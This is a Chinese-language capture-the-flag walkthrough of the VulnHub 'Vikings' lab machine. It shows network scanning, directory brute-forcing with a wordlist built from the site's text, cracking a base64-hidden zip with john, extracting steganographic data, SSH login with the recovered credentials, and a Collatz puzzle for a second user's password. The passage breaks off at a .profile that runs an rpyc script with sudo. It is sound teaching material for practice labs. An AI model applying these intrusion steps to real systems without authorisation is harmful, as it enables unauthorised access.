靶机:Vikings

准备工作

  • 靶机地址: https://download.vulnhub.com/vikings/Vikings.ova

    • MD5 校验:84f72c38e2458e01d00db920a40d51ea

    • SHA1 检验:1c8ac7a6c7454c8c8081cd65af305c2a3ee803d4

      • cmd 进行校验: certutil -hashfile 文件路径 EncryptionType
      • powershell 进行校验: Get-FileHash 文件路径 -Algorithm EncryptionType | Format-List
      • EncryptionType 是加密类型:SHA1, MD5
    • 使用 VirtualBox

    • 网络 Host-Only

  • 配置网络环境:https://www.cnblogs.com/shadow-/p/16815020.html

    • kali: NAT + [ Bridged/Host-Only ]

靶机攻略

发现目标

使用常规工具:

  • arp-scan
  • nmap
  • netdiscover
  • fping

初步扫描 sudo arp-scan -l -I eth1

┌──(kali㉿kali)-[~]
└─$ sudo arp-scan -l -I eth1
[sudo] kali 的密码:
Interface: eth1, type: EN10MB, MAC: 08:00:27:5f:50:d7, IPv4: 192.168.56.116
Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:0d (Unknown: locally administered)
192.168.56.100 08:00:27:fe:df:e0 PCS Systemtechnik GmbH
192.168.56.120 08:00:27:c3:38:3d PCS Systemtechnik GmbH 3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.8: 256 hosts scanned in 2.177 seconds (117.59 hosts/sec). 3 responded
  • 发现目标 192.168.56.120
  • 192.168.56.1 是 virtualbox 在 Host-Only 的网关地址
  • 192.168.56.100 是 virtualbox 在 Host-Only 的 DHCP 服务器地址

使用 nmap 对发现 IP 进行端口扫描 nmap -A -T4 192.168.56.120

┌──(kali㉿kali)-[~]
└─$ nmap -A -T4 192.168.56.120
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-01 11:08 CST
Nmap scan report for 192.168.56.120
Host is up (0.0016s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 59d4c0fd6245978315c015b2ac256099 (RSA)
| 256 7e37f011638015a3d39d43c609befbda (ECDSA)
|_ 256 52e94f71bc14dc0034f2a7b358b50dce (ED25519)
80/tcp open http Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2020-10-29 21:07 site/
|_
|_http-title: Index of /
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.84 seconds
  • 目标开发两个端口 22, 80
  • 22/tcp 是经典的 SSH 版本是 OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
  • 80/tcp 是经典的 http 服务使用 Apache httpd 2.4.29
  • 其中 http-title: Index of /Index of / 页面网站下的所有文件和文件夹中,不必在通过HTTP的网页形式了,从而避免了那些网站的限制

信息收集

信息收集一般从易到难,我们先从 http://192.168.56.120:80/ 突入,使用 firefox 或 curl 简单查看一下页面

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /</title>
</head>
<body>
<h1>Index of /</h1>
<table>
<tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=A">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=D">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
<tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="site/">site/</a></td><td align="right">2020-10-29 21:07 </td><td align="right"> - </td><td>&nbsp;</td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.56.120 Port 80</address>
</body></html>
  • 一个文件目录,其中有名为 site 的目录,大概意思应该是站点
  • 我们使用 firefox 访问 http://192.168.56.120/site/ 发现长时间无法访问,建议通过 curl http://192.168.56.120/site/ 进行访问
<!DOCTYPE html>
<!-- This site was created in Webflow. http://www.webflow.com -->
<!-- Last Published: Fri May 01 2020 14:48:48 GMT+0000 (Coordinated Universal Time) -->
<html data-wf-page="5ea837e8c81001b668dffd4a" data-wf-site="5ea837e8c8100167b2dffd49">
<head>
<meta charset="utf-8">
<title>Split</title>
<meta content="width=device-width, initial-scale=1" name="viewport">
<meta content="Webflow" name="generator">
<link href="css/normalize.css" rel="stylesheet" type="text/css">
<link href="css/webflow.css" rel="stylesheet" type="text/css">
<link href="css/split-opl.webflow.css" rel="stylesheet" type="text/css">
<script src="https://ajax.googleapis.com/ajax/libs/webfont/1.6.26/webfont.js" type="text/javascript"></script>
<script type="text/javascript">WebFont.load({ google: { families: ["Inter:regular,600","Lora:regular"] }});</script>
<!-- [if lt IE 9]><script src="https://cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7.3/html5shiv.min.js" type="text/javascript"></script><![endif] -->
<script type="text/javascript">!function(o,c){var n=c.documentElement,t=" w-mod-";n.className+=t+"js",("ontouchstart"in o||o.DocumentTouch&&c instanceof DocumentTouch)&&(n.className+=t+"touch")}(window,document);</script>
<link href="images/favicon.png" rel="shortcut icon" type="image/x-icon">
<link href="images/webclip.jpg" rel="apple-touch-icon">
<style type="text/css">
body {
-webkit-font-smoothing: antialiased;
}
</style>
</head>
<body class="body">
<div class="columns w-row">
<div class="leftcontent w-col w-col-6 w-col-stack">
<div data-w-id="b84f5156-c6e2-fb1d-6606-98a08030a472" style="opacity:0" class="image"></div>
</div>
<div class="rightcontent w-col w-col-6 w-col-stack">
<div data-w-id="3fd5aeb3-22da-ed60-7286-0d11f16597d3" style="opacity:0" class="content">
<div class="name">Ivar The Boneless</div>
<h1 class="tagline"><strong class="bold-text">Mad King</strong></h1>
<p class="bio">865 the Great Heathen Army, led by Ivar, invaded the Anglo-Saxon Heptarchy.The Heptarchy was the collective name for the seven kingdoms East Anglia, Essex, Kent, Mercia, Northumbria, Sussex and Wessex. The invasion was organised by the sons of Ragnar Lodbrok, to wreak revenge against Ælla of Northumbria who had supposedly executed Ragnar in 865 by throwing him in a snake pit, but the historicity of this explanation is unknown.According to the saga, Ivar did not overcome Ælla and sought reconciliation. He asked for only as much land as he could cover with an ox's hide and swore never to wage war against Ælla. Then Ivar cut the ox's hide into such fine strands that he could envelop a large fortress (in an older saga it was York and according to a younger saga it was London), which he could take as his own. (Compare the similar legendary ploy of Dido.)</p>
<div class="links w-row">
<div class="column w-col w-col-4">
<div class="text-block-2">Connect</div>
<ul class="list w-list-unstyled">
<li><a href="#">Blog</a></li>
<li><a href="#">Email</a></li>
<li><a href="#">Newsletter</a></li>
</ul>
</div>
<div class="column-2 w-col w-col-4">
<div class="text-block-2">social</div>
<ul class="list w-list-unstyled">
<li><a href="#">Twitter</a></li>
<li><a href="#">Instagram</a></li>
<li><a href="#">Dribbble</a></li>
</ul>
</div>
<div class="w-col w-col-4">
<div class="text-block-2">network</div>
<ul class="list w-list-unstyled">
<li><a href="#">Link One</a></li>
<li><a href="#">Link Two</a></li>
<li><a href="#">Link Three</a></li>
</ul>
</div>
</div>
<div class="credit">2020 Ivar The Boneless</div>
</div>
</div>
</div>
<script src="https://d3e54v103j8qbb.cloudfront.net/js/jquery-3.4.1.min.220afd743d.js?site=5ea837e8c8100167b2dffd49" type="text/javascript" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"></script>
<script src="js/webflow.js" type="text/javascript"></script>
<!-- [if lte IE 9]><script src="https://cdnjs.cloudflare.com/ajax/libs/placeholders/3.0.2/placeholders.min.js"></script><![endif] -->
</body>
</html>
  • 从页面中的我们大概知道访问慢的原因是网页使用了一些外网链接比如 https://ajax.googleapis.com/ajax/libs/webfont/1.6.26/webfont.js 这样的外网内容,导致在国内无法加载

  • 注释中的特殊内容是用于浏览器 IE 兼容问题

  • 网页中大部分 <a> 链接都是假的,href="#" 是指当前页面

  • 网页中文章内容解读应该从 <title>Split</title><div class="name">Ivar The Boneless</div> 、以及 <p class="bio"> 中的文本,大概意思是分裂的主题,一般我们需要提取其中的 人名地名 做为我们后续密码破解的字典,因为部分人会根据自己的喜好用故事中的人名地名做密码或账号的内容

    无骨伊瓦尔
    
    865年,由伊瓦尔率领的大希思军团入侵盎格鲁撒克逊人的赫帕奇。赫普塔克王朝是东安格利亚、埃塞克斯、肯特、麦西亚、诺森布里亚、苏塞克斯和威塞克斯七个王国的统称。这次入侵是由拉格纳·洛德布罗克(Ragnar Lodbrok)的儿子组织的,目的是为了报复诺森布里亚的Ælla,据称他于865年将拉格纳扔进蛇坑处决,但这一解释的历史性不得而知。根据传说,伊瓦尔没有克服Ælla并寻求和解。他只要求用牛皮覆盖尽可能多的土地,并发誓永远不会对Ælla发动战争。然后伊瓦尔把牛皮剪成细绳,他可以包围一座大城堡(在一个古老的传说中是约克,根据一个年轻的传说是伦敦),他可以把它当作自己的城堡。(比较迪多的类似传奇策略。)

目前我们已经没有线索了,这种时候就应该对其 Web 路径进行爆破,查看是否存在隐藏路径,推荐工具

  • dirsearch
  • dirb
  • dirbuster
  • gobuster
  • feroxbuster
┌──(kali㉿kali)-[~]
└─$ dirsearch -u http://192.168.56.120 _|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927 Output File: /home/kali/.dirsearch/reports/192.168.56.120/_22-12-01_11-42-58.txt Error Log: /home/kali/.dirsearch/logs/errors-22-12-01_11-42-58.log Target: http://192.168.56.120/ [11:42:58] Starting:
[11:43:02] 403 - 279B - /.ht_wsr.txt
[11:43:02] 403 - 279B - /.htaccess.save
[11:43:02] 403 - 279B - /.htaccess_orig
[11:43:02] 403 - 279B - /.htaccess.sample
[11:43:02] 403 - 279B - /.htaccess.bak1
[11:43:02] 403 - 279B - /.htaccess_extra
[11:43:02] 403 - 279B - /.htaccess.orig
[11:43:02] 403 - 279B - /.htaccessBAK
[11:43:02] 403 - 279B - /.htaccessOLD
[11:43:02] 403 - 279B - /.htaccess_sc
[11:43:02] 403 - 279B - /.httr-oauth
[11:43:02] 403 - 279B - /.htpasswds
[11:43:02] 403 - 279B - /.htpasswd_test
[11:43:02] 403 - 279B - /.htm
[11:43:02] 403 - 279B - /.html
[11:43:02] 403 - 279B - /.htaccessOLD2
[11:45:17] 403 - 279B - /server-status
[11:45:17] 403 - 279B - /server-status/
[11:45:21] 301 - 315B - /site -> http://192.168.56.120/site/
[11:45:22] 200 - 4KB - /site/ Task Completed

目前只有 http://192.168.56.120/site/ 所以继续爆破

┌──(kali㉿kali)-[~]
└─$ dirsearch -u http://192.168.56.120/site/ _|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927 Output File: /home/kali/.dirsearch/reports/192.168.56.120/-site-_22-12-01_11-47-48.txt Error Log: /home/kali/.dirsearch/logs/errors-22-12-01_11-47-48.log Target: http://192.168.56.120/site/ [11:47:48] Starting:
[11:47:49] 301 - 318B - /site/js -> http://192.168.56.120/site/js/
[11:47:52] 403 - 279B - /site/.ht_wsr.txt
[11:47:52] 403 - 279B - /site/.htaccess.sample
[11:47:52] 403 - 279B - /site/.htaccess.orig
[11:47:52] 403 - 279B - /site/.htaccess.save
[11:47:52] 403 - 279B - /site/.htaccess_extra
[11:47:52] 403 - 279B - /site/.htaccess_orig
[11:47:52] 403 - 279B - /site/.htaccess_sc
[11:47:52] 403 - 279B - /site/.htaccessBAK
[11:47:52] 403 - 279B - /site/.htaccessOLD
[11:47:52] 403 - 279B - /site/.htaccessOLD2
[11:47:52] 403 - 279B - /site/.htm
[11:47:52] 403 - 279B - /site/.html
[11:47:52] 403 - 279B - /site/.htaccess.bak1
[11:47:52] 403 - 279B - /site/.htpasswd_test
[11:47:52] 403 - 279B - /site/.htpasswds
[11:47:52] 403 - 279B - /site/.httr-oauth
[11:48:42] 301 - 319B - /site/css -> http://192.168.56.120/site/css/
[11:49:00] 200 - 1KB - /site/images/
[11:49:00] 301 - 322B - /site/images -> http://192.168.56.120/site/images/
[11:49:03] 200 - 4KB - /site/index.html
[11:49:05] 200 - 951B - /site/js/
  • 没有什么新鲜内容,我们需要所以之前收集的信息制作一个字典用于爆破,使用 python 制作字典生成脚本 create_dict.py
import re

text = r"865 the Great Heathen Army, led by Ivar, invaded the Anglo-Saxon Heptarchy.The Heptarchy was the collective name for the seven kingdoms East Anglia, Essex, Kent, Mercia, Northumbria, Sussex and Wessex. The invasion was organised by the sons of Ragnar Lodbrok, to wreak revenge against Ælla of Northumbria who had supposedly executed Ragnar in 865 by throwing him in a snake pit, but the historicity of this explanation is unknown.According to the saga, Ivar did not overcome Ælla and sought reconciliation. He asked for only as much land as he could cover with an ox's hide and swore never to wage war against Ælla. Then Ivar cut the ox's hide into such fine strands that he could envelop a large fortress (in an older saga it was York and according to a younger saga it was London), which he could take as his own. (Compare the similar legendary ploy of Dido.)"
text_dict = text.split(' ') # 格式化去重
res = []
[res.append(re.sub(r'[\W]', '', i) + r'.%EXT%' + '\n') for i in text_dict if i not in res] # 生成字典文件
with open('text_dict.txt', 'w', encoding='utf-8') as f:
f.writelines(res)
  • 生成的字典会在当前目录名称 text_dict.txt
  • dirsearch -u 网址 -w 自定义目录地址
┌──(kali㉿kali)-[~/workspace]
└─$ dirsearch -u http://192.168.56.120/site/ -w ~/workspace/text_dict.txt -e php,html,js,txt _|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| ) Extensions: php, html, js, txt | HTTP method: GET | Threads: 30 | Wordlist size: 412 Output File: /home/kali/.dirsearch/reports/192.168.56.120/-site-_22-12-01_12-38-55.txt Error Log: /home/kali/.dirsearch/logs/errors-22-12-01_12-38-55.log Target: http://192.168.56.120/site/ [12:38:56] Starting:
[12:38:59] 200 - 13B - /site/war.txt Task Completed
  • 发现一文件 /site/war.txt

使用 curl http://192.168.56.120/site/war.txt

┌──(kali㉿kali)-[~/workspace]
└─$ curl http://192.168.56.120/site/war.txt
/war-is-over

在火狐上查看 curl http://192.168.56.120/site/war-is-over 是大量 base64 编码,我们可以使用 wget http://192.168.56.120/site/war-is-over 下载到本地查看

┌──(kali㉿kali)-[~/workspace]
└─$ wget http://192.168.56.120/site/war-is-over
--2022-12-01 12:49:57-- http://192.168.56.120/site/war-is-over
正在连接 192.168.56.120:80... 已连接。
已发出 HTTP 请求,正在等待回应... 301 Moved Permanently
位置:http://192.168.56.120/site/war-is-over/ [跟随至新的 URL]
--2022-12-01 12:49:57-- http://192.168.56.120/site/war-is-over/
再次使用存在的到 192.168.56.120:80 的连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:1881260 (1.8M) [text/html]
正在保存至: “war-is-over” war-is-over 100%[=========================================================>] 1.79M --.-KB/s 用时 0.04s 2022-12-01 12:49:57 (50.0 MB/s) - 已保存 “war-is-over” [1881260/1881260]) ┌──(kali㉿kali)-[~/workspace]
└─$ ls
a.php create_dict.py proxychains.conf text_dict.txt war-is-over x.txt ┌──(kali㉿kali)-[~/workspace]
└─$ cat war-is-over
UEsDBDMDAQBjAAKAI1MAAAAA3IYVAALRFQAEAAsAa2luZwGZBwACAEFFAQgAV3rWTJK9PAXMoWx/fo3tm3aPB1giBaLhkGT8nQpRDt1eI0cOwDhahacPQYGBBGk/wLB8p6AtIrr+sGlWKfinjvrKMgkOOAqem2D8GNfzr1IxU0q876/02NC9VxpiYK9IKw425FqBcBJFcNXZ7PCVGwVVJyHKplUukjl31Em2ICx7r5toNOSVXJP8XOeUY8c7xPY72B1dbQ2PdEp3PwCggZ0UWRonMorjNCAT3D8Tj/x5zrlnvDuC4yIhhFDxiWLjIVR0dDJuZhd/JM+KVR4I9YrEmqupHLKJcfqf/BlvgMU/iXo7sMd1y/ck6wM11sgYq8EF557aeSPXjD2hI8iztksZZS9sx3lEHqPRlRn2zMDFOI+5A8iTO+nAJ7HkFt4NfyJjWNCuFzCnv/TVOBQfNfPgKyYdjUW/CHarhPlctpeV+IiqsoHW1M6S2aHLM9wk8zOlh+7m6le6ifo23usST80Wt48EYs5y+uz4621cr1nY8lc2jf95prNYrtMIuJaargXZy84fwVyZKWXBuanEWBE/soy0l4KL/wy2KhF2438RQwf7zbgwvRhGeGsnsNdDRkMb9L9+bA42w6XlhK2sonSTwkYlK1OEp0fxuoSRsEdOT9gX8/2E8C95LTdz2j637XHJy+gIXjx2mZWTfYTbaJl5YnO3DSOuI9gMBzIAqfuJo8zQPu9ouHY59q5Nojtaq4QZLpnCbCexyogk5PDMCQxhMZztzNR7nVo3KWRxBsYa41fqeAaSk1KnQRDsRR7fVzuanL/J67NjX2ULXhKgxGhv8Csk6U9dfUj3djfVlw7uRi/FkiQ8hRBEoUG3JF4IRV49mYBY87+eRQLScAVDFfx0HrCY/M/zpVvl8hVvO4dqWGz2qEl+90C8sJ
... ... ...

我们使用 base64 war-is-over -d | more 解密并查看内容,发现是大量的乱码但开头的 PK3c 一般表明可能是二进制文件

┌──(kali㉿kali)-[~/workspace]
└─$ base64 war-is-over -d | more
PK3c�#S܆�
king�AWz�L��<l~���v�X"���d��
Q�^#G�8Z��A��i?��|��-"���iV)�����2 8
��`�▒���R1SJ�����нW▒b`�H+6�Z�pEp�����'!ʦU.�9w�I� ,{��h4��\��\��c�;��;�]m ▒"o��
|V�H3a��~���U�2L���r��
A�)SA�捓޶qV��^��'�6�z$e����aۉh�¥�5�+����d�h�r�6%���w�(��=����Re5���▒�Xպi��f
����&I����������鋯�7z1�,l���Q0�P�"�f+"���JǙfg}y�
�^�V�y��<��T!�▒5���▒s�#�D��r�Q%��s������<0^;Հ��R=@`� ��-X�W���:7J6]��<��Y�Q���O���(ʃ�d<#���
  • 当然以上我们不确定,我们可以使用 https://gchq.github.io/CyberChef/Detect File Type 进一步探测,最终知道是 zip 类型文件
  • 使用 base64 war-is-over -d > a.zip 获取为压缩包,在解压是会发现需要密码

John 密码破解 ZIP

  • 先生成 john 可以理解的数据 zip2john a.zip > data
  • 使用自带的字典 /usr/share/wordlists/rockyou.txt 如果没有可能是没有解压字典
  • 破译 john data --wordlist=/usr/share/wordlists/rockyou.txt
┌──(kali㉿kali)-[~/workspace]
└─$ john data --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 128/128 SSE2 4x])
Cost 1 (HMAC size) is 1410760 for all loaded hashes
Press 'q' or Ctrl-C to abort, almost any other key for status
ragnarok123 (a.zip/king)
1g 0:00:01:11 DONE (2022-12-01 13:15) 0.01403g/s 4143p/s 4143c/s 4143C/s raihanah..raejean
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
  • 密码为 ragnarok123
  • 解压后是一张图片 king
  • 密码的 ragnarok 也是前文中的一个人名

隐写术

一般这种刻意隐藏,已经和图片或 pdf 都会涉及隐写术,我们使用相关工具进行检验

┌──(kali㉿kali)-[~/workspace]
└─$ steghide info king
"king":
format: jpeg
capacity: 76.2 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
  • 其中雀实存在隐写,但存在密码
┌──(kali㉿kali)-[~/workspace]
└─$ foremost king 127 ⨯
Processing: king
|foundat=user��wK��/-v�O,I*��II-�O����t(����K/V p���9�▒�'��1W�
*|
  • 使用 foremost 提取数据会在当前目录下生成 output 的目录
┌──(kali㉿kali)-[~/workspace]
└─$ tree output
output
├── audit.txt
├── jpg
│   └── 00000000.jpg
└── zip
└── 00002792.zip 2 directories, 3 files
  • audit.txt 是日志不用管
  • 00000000.jpg 是原本那张图片
  • 00002792.zip 就是我们需要的隐藏数据
┌──(kali㉿kali)-[~/workspace]
└─$ unzip output/zip/00002792.zip
Archive: output/zip/00002792.zip
inflating: user
  • 00002792.zip 解压得到的只有 user 文件
  • 下面是 user 文件内容
//FamousBoatbuilder_floki@vikings
//f@m0usboatbuilde7

明显这种格式已经文件名称 user 我们下一步应该是 SSH 登录尝试

SSH 登录

首先我们分析一下已有信息,一般这种有寓意类的在故事中都存在暗示

  • 来自网页的 http://192.168.56.120:80/ 信息

    <title>Split</title>
    
    Ivar The Boneless
    
    <h1>Mad King</h1>
    
    865 the Great Heathen Army, led by Ivar, invaded the Anglo-Saxon Heptarchy.The Heptarchy was the collective name for the seven kingdoms East Anglia, Essex, Kent, Mercia, Northumbria, Sussex and Wessex. The invasion was organised by the sons of Ragnar Lodbrok, to wreak revenge against Ælla of Northumbria who had supposedly executed Ragnar in 865 by throwing him in a snake pit, but the historicity of this explanation is unknown.According to the saga, Ivar did not overcome Ælla and sought reconciliation. He asked for only as much land as he could cover with an ox's hide and swore never to wage war against Ælla. Then Ivar cut the ox's hide into such fine strands that he could envelop a large fortress (in an older saga it was York and according to a younger saga it was London), which he could take as his own. (Compare the similar legendary ploy of Dido.)
  • user 文件

    //FamousBoatbuilder_floki@vikings
    //f@m0usboatbuilde7

其中的关键人物 Ragnar Lodbrok 感兴趣可以查看关于他的故事,他是北欧传说中的半传奇英雄一位传奇海盗领袖,他最终在 865 年因为遭遇海难,漂流至英格兰的诺森布里亚国王Aella的领地,被俘后遭处死,上面故事其 “无骨者” 伊瓦尔 和 “白衣” 哈夫丹 为父亲 Ragnar Lodbrok 复仇,在标题中是分裂

  • 我们找到的隐藏文件 war 是战争,在 war-is-over 是战争结束,我们破译时使用的密码是 ragnarok123 明显是指 Ragnar Lodbrok 得到的文件也是 king 这张图片,Ragnar Lodbrok 是他们的王或称首领,图片中是维京人的船,FamousBoatbuilder 是船制造者,后面接的 vikings 是指维京人的意思,那么 floki 就应该是人名,是 king 这张图片中船的制造者,其实也可以百度 floki 和维京人可以发现这就是一个经典的维京人名称,故事中 Ragnar 和他的筑船师朋友 Floki 共同建造了能够征服北大西洋的新型「无畏舰」

    其中 floki 也有英勇的含义,在维京人的传说中勇敢无畏的战士在死后会通过船只引渡到英灵殿中,这是维京人的之高荣誉,并且在故事中 865 年是 Ragnar Lodbrok 死去的时间节点

  • 在 SSH 是我们都是 name@host 以此推断 floki@192.168.56.120

  • 密码应该是 f@m0usboatbuilde7

其实此处应该使用以上信息生成账号字典与密码字典进行爆破是最为有效的策略

┌──(kali㉿kali)-[~]
└─$ ssh floki@192.168.56.120
The authenticity of host '192.168.56.120 (192.168.56.120)' can't be established.
ED25519 key fingerprint is SHA256:volom5GRMcetvgfJsyVTXVnNY0FUA6W1k/5fsdHs9T4.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.120' (ED25519) to the list of known hosts.
floki@192.168.56.120's password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-154-generic x86_64) * Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage System information as of Fri Dec 2 01:49:58 UTC 2022 System load: 0.23 Processes: 98
Usage of /: 52.0% of 8.79GB Users logged in: 0
Memory usage: 18% IP address for enp0s3: 192.168.56.120
Swap usage: 0% 0 updates can be applied immediately. You have mail.
Last login: Sat Sep 4 04:38:04 2021 from 10.42.0.1
floki@vikings:~$ id
uid=1000(floki) gid=1000(floki) groups=1000(floki),4(adm),24(cdrom),30(dip),46(plugdev),108(lxd)

尝试提权

先查看一下当前目录的信息

floki@vikings:~$ ls
boat readme.txt
floki@vikings:~$ cat boat
#Printable chars are your ally.
#num = 29th prime-number.
collatz-conjecture(num)
floki@vikings:~$ cat readme.txt
_______________________________________________________________________Floki-Creation____________________________________________________________________________________________________ I am the famous boat builder Floki. We raided Paris this with our all might yet we failed. We don't know where Ragnar is after the war. He is in so grief right now. I want to apologise to him.
Because it was I who was leading all the Vikings. I need to find him. He can be anywhere.
I need to create this `boat` to find Ragnar
  • boat 是船的意思
  • readme.txt 是 Floki 的故事

查看一番 /etc/passwd

floki@vikings:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
floki:x:1000:1000:floki:/home/floki:/bin/bash
ragnar:x:1001:1001::/home/ragnar:/bin/sh
  • floki 之外还存在 ragnar 其中 Ragnar 是他们的王,或许 ragnar 应该有 root 权限
  • readme.txt 中 Floki 说想要找到 Ranger 我们需要船
  • boat 是船

所以我们需要解谜

#Printable chars are your ally.
#num = 29th prime-number.
collatz-conjecture(num)
  • num 是第 29 个素数
  • collatz-conjecture 数学的考拉兹猜想
  • 需要是可打印的字符

编写代码,记着可以使用分屏 ctrl+shift+D

import math

prime = []
for i in range(2, 10000):
if i == 2:
prime.append(i)
else:
for j in range(2, int(math.sqrt(i)) + 1):
if i % j == 0:
break
else:
prime.append(i) num = prime[28] c = [] while num != 1:
if 0x20 <= num and num <= 0x7E:
print(chr(num), end='')
if num % 2 == 1:
num = 3 * num + 1
else:
num //= 2

执行结果

┌──(kali㉿kali)-[~/workspace]
└─$ python3 collatz-conjecture.py
mR)|>^/Gky[gz=\.F#j5P(
  • 密码为 mR)|>^/Gky[gz=\.F#j5P(

在登录的 ssh 上使用 su ragnar 进行登录

floki@vikings:~$ su ragnar
Password:
$ mR)|>^/Gky[gz=\.F#j5P(
sh: 1: Syntax error: ")" unexpected
$ id
uid=1001(ragnar) gid=1001(ragnar) groups=1001(ragnar)
  • 登录后似乎还需要什么,但密码并不是 mR)|>^/Gky[gz=\.F#j5P( 而且 ragnar 并没有 root 权限

我们需要探查一下 ragnar

$ ls -lah
total 48K
drwxr-xr-x 5 floki floki 4.0K Sep 4 2021 .
drwxr-xr-x 4 root root 4.0K Sep 3 2021 ..
lrwxrwxrwx 1 root root 9 Sep 3 2021 .bash_history -> /dev/null
-rw-r--r-- 1 floki floki 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 floki floki 3.7K Apr 4 2018 .bashrc
-rw-r--r-- 1 floki floki 82 Oct 11 2020 boat
drwx------ 2 floki floki 4.0K Sep 3 2021 .cache
drwx------ 3 floki floki 4.0K Sep 3 2021 .gnupg
drwxrwxr-x 3 floki floki 4.0K Sep 3 2021 .local
-rw-r--r-- 1 floki floki 806 Sep 4 2021 .profile
-rw-r--r-- 1 floki floki 516 Oct 11 2020 readme.txt
-rw-rw-r-- 1 floki floki 66 Sep 3 2021 .selected_editor
-rw-r--r-- 1 floki floki 0 Sep 3 2021 .sudo_as_admin_successful
-rw------- 1 floki floki 897 Sep 4 2021 .viminfo
$ ls
boat readme.txt
$ cat boat
#Printable chars are your ally.
#num = 29th prime-number.
collatz-conjecture(num)
$ cat readme.txt
_______________________________________________________________________Floki-Creation____________________________________________________________________________________________________ I am the famous boat builder Floki. We raided Paris this with our all might yet we failed. We don't know where Ragnar is after the war. He is in so grief right now. I want to apologise to him.
Because it was I who was leading all the Vikings. I need to find him. He can be anywhere.
I need to create this `boat` to find Ragnar
$
  • 和上一个 Floki 很像,但并没有什么有价值的信息
  • 在开始时有一个输入的过程,说明它自启动了某种脚本,而且在 floki 上是 bash 但 ragnar 却使用的 sh 这明显不合理,在 linux 中 bash 存在一种自登录的机制,那么我们开始时的那个脚本是不是于此有关

综上我们应该查看 .bashrc.profile 文件一般会有 bash 自启动的程序

$ cat .profile
# ~/.profile: executed by the command interpreter for login shells.
# This file is not read by bash(1), if ~/.bash_profile or ~/.bash_login
# exists.
# see /usr/share/doc/bash/examples/startup-files for examples.
# the files are located in the bash-doc package. # the default umask is set in /etc/profile; for setting the umask
# for ssh logins, install and configure the libpam-umask package.
#umask 022
sudo python3 /usr/local/bin/rpyc_classic.py
# if running bash
if [ -n "$BASH_VERSION" ]; then
# include .bashrc if it exists
if [ -f "$HOME/.bashrc" ]; then
. "$HOME/.bashrc"
fi
fi # set PATH so it includes user's private bin if it exists
if [ -d "$HOME/bin" ] ; then
